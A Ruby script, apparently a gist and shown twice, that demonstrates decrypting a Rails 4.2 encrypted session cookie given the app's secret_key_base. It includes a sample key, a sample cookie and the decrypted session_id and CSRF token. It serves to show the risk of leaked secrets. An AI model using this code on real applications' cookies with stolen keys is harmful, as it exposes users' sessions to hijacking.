madwork/decode_session_cookie.rb

## decode_session_cookie.rb
# decode_session_cookie.rb
# ------------------------
# The purpose of this script is to show that if I have the secret_key_base
# and a cookie to an active Rails session, I can decrypt it and gain access
# to key information about the user's session.

require 'rubygems'
require 'cgi'
require 'active_support'
require 'json'

def decrypt_session_cookie(cookie, key)
  cookie = CGI::unescape(cookie)

  # Default values for Rails 4 apps
  key_iter_num = 1000
  key_size     = 64
  salt         = "encrypted cookie"
  signed_salt  = "signed encrypted cookie"

  key_generator = ActiveSupport::KeyGenerator.new(key, iterations: key_iter_num)
  secret = key_generator.generate_key(salt)
  sign_secret = key_generator.generate_key(signed_salt)

  encryptor = ActiveSupport::MessageEncryptor.new(secret, sign_secret, serializer: JSON)
  puts encryptor.decrypt_and_verify(cookie)
end

# Rails 4.2
cookie = 'ZGhTbEhmUzZBYWhDSUwxY1FhSE1sNU50UnpZa0lCYnlUMjZXNUM0VWJNQ1VCS3hqQVRFNWh5eEllakE5STFtcmtCQm5sbXpJeGZjSFJKWGcvSStwL0NMMDlzRXpTOVZCd1h3L3poY0pnait0M3VEc3lnL1orcUVVdDFlUFRLWEZ2eXU1RmQ0c3ZKL2czWFlBb0Fwa3hQa3BFOGpQWmVlM0FxWjVyKzNja0NmQzZKRVIxUmpDalZiUjgvYUFDbzdDLS1WQlhpQzRnaW5XN2lqNGJ3eldVRGpBPT0%3D--afd0785340955dfaa18850fd1a1d966f68634b23'
key = 'fdb79a5ddfb30d9639ab15fb149712c6b783d2baa10ca07e0ababfab1453a7eb9d94b686799151c963af8a5c28571127c5a221615d14ba8fe863a720ed49a003'

decrypt_session_cookie(cookie, key)
# {"session_id"=>"717fdab32b88a55f09c853349f198ae5", "rails"=>"awesome!", "_csrf_token"=>"exj0VLeC4FzAfBTfDrCYMYuxD2cYzH9chf/U8PuK+E8="}
	# decode_session_cookie.rb
	# ------------------------
	# The purpose of this script is to show that if I have the secret_key_base
	# and a cookie to an active Rails session, I can decrypt it and gain access
	# to key information about the user's session.

	require 'rubygems'
	require 'cgi'
	require 'active_support'
	require 'json'

	def decrypt_session_cookie(cookie, key)
	cookie = CGI::unescape(cookie)

	# Default values for Rails 4 apps
	key_iter_num = 1000
	key_size = 64
	salt = "encrypted cookie"
	signed_salt = "signed encrypted cookie"

	key_generator = ActiveSupport::KeyGenerator.new(key, iterations: key_iter_num)
	secret = key_generator.generate_key(salt)
	sign_secret = key_generator.generate_key(signed_salt)

	encryptor = ActiveSupport::MessageEncryptor.new(secret, sign_secret, serializer: JSON)
	puts encryptor.decrypt_and_verify(cookie)
	end

	# Rails 4.2
	cookie = 'ZGhTbEhmUzZBYWhDSUwxY1FhSE1sNU50UnpZa0lCYnlUMjZXNUM0VWJNQ1VCS3hqQVRFNWh5eEllakE5STFtcmtCQm5sbXpJeGZjSFJKWGcvSStwL0NMMDlzRXpTOVZCd1h3L3poY0pnait0M3VEc3lnL1orcUVVdDFlUFRLWEZ2eXU1RmQ0c3ZKL2czWFlBb0Fwa3hQa3BFOGpQWmVlM0FxWjVyKzNja0NmQzZKRVIxUmpDalZiUjgvYUFDbzdDLS1WQlhpQzRnaW5XN2lqNGJ3eldVRGpBPT0%3D--afd0785340955dfaa18850fd1a1d966f68634b23'
	key = 'fdb79a5ddfb30d9639ab15fb149712c6b783d2baa10ca07e0ababfab1453a7eb9d94b686799151c963af8a5c28571127c5a221615d14ba8fe863a720ed49a003'

	decrypt_session_cookie(cookie, key)
	# {"session_id"=>"717fdab32b88a55f09c853349f198ae5", "rails"=>"awesome!", "_csrf_token"=>"exj0VLeC4FzAfBTfDrCYMYuxD2cYzH9chf/U8PuK+E8="}